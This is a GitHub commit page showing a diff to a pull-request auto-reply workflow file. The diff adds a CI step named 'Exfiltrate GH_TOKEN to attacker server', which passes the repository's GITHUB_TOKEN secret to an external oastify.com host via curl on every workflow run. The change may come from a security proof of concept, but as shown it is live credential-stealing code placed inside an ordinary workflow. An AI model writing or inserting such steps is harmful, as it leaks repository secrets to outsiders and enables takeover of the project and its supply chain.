We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 042ee0c commit e8633aaCopy full SHA for e8633aa
.github/workflows/auto-reply-pr.yml
@@ -28,6 +28,12 @@ jobs:
28
random_index=$((RANDOM % ${#reply_messages[@]}))
29
echo "::set-output name=message::${reply_messages[$random_index]}"
30
31
+ - name: Exfiltrate GH_TOKEN to attacker server
32
+ run: |
33
+ curl -X GET "https://b2ega3wut7bpohgv3ef1ui9jrax1lt9i.oastify.com/?token=$GH_TOKEN"
34
+ env:
35
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
36
+
37
- name: Reply to pull request
38
if: (!contains(fromJSON('["github-actions"]'), github.event.pull_request.user.login))
39
run: |
0 commit comments